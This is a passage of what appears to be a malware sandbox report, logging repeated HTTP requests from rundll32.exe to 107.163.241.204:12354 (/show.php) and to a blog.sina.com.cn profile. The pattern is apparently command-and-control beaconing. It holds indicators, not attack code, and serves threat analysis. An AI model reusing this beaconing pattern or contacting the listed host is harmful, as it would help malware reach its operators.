                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      99192.168.2.951281107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:11.311927080 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      100192.168.2.951398107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:13.324873924 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      101192.168.2.951413107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:13.550810099 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      102192.168.2.951518107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:15.216516018 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      103192.168.2.951526107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:15.328713894 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      104192.168.2.951528202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:15.350385904 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:16.914438009 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      105192.168.2.951647107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:17.465831995 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      106192.168.2.951656107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:17.579092026 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      107192.168.2.951746107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:19.232347965 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      108192.168.2.951754107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:19.350450039 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      109192.168.2.951755202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:19.350764990 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:20.919367075 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:20 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      110192.168.2.951887107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:21.482290983 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      111192.168.2.951895107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:21.605012894 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      112192.168.2.953096107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:23.250932932 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      113192.168.2.953196107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:23.370752096 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      114192.168.2.953200202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:23.378680944 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:25.004707098 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      115192.168.2.955196107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:25.520596981 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      116192.168.2.955373107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:25.643363953 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      117192.168.2.956825107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:27.264153957 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      118192.168.2.956943107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:27.383249998 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      119192.168.2.956944202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:27.386986017 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:28.957947016 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      120192.168.2.958262107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:29.517155886 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      121192.168.2.958391107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:29.637411118 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      122192.168.2.959886107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:31.284693956 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      123192.168.2.960100202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:31.400567055 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:32.985845089 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      124192.168.2.960187107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:31.459821939 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      125192.168.2.962140107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:33.532506943 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      126192.168.2.962324107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:33.703341961 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      127192.168.2.963850107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:35.283638954 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      128192.168.2.963952202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:35.399096012 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:36.966459036 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      129192.168.2.963953107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:35.403767109 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      130192.168.2.949408107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:37.516697884 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      131192.168.2.949568107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:37.649025917 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      132192.168.2.950337202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:38.908620119 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      133192.168.2.950887107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:39.296591043 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      134192.168.2.950977202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:39.413924932 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:40.981899977 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:40 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      135192.168.2.950978107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:39.413924932 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      136192.168.2.952262107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:41.544770002 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      137192.168.2.952324107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:41.657172918 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      138192.168.2.953380202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:43.011276007 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      139192.168.2.953384107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:43.600306034 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
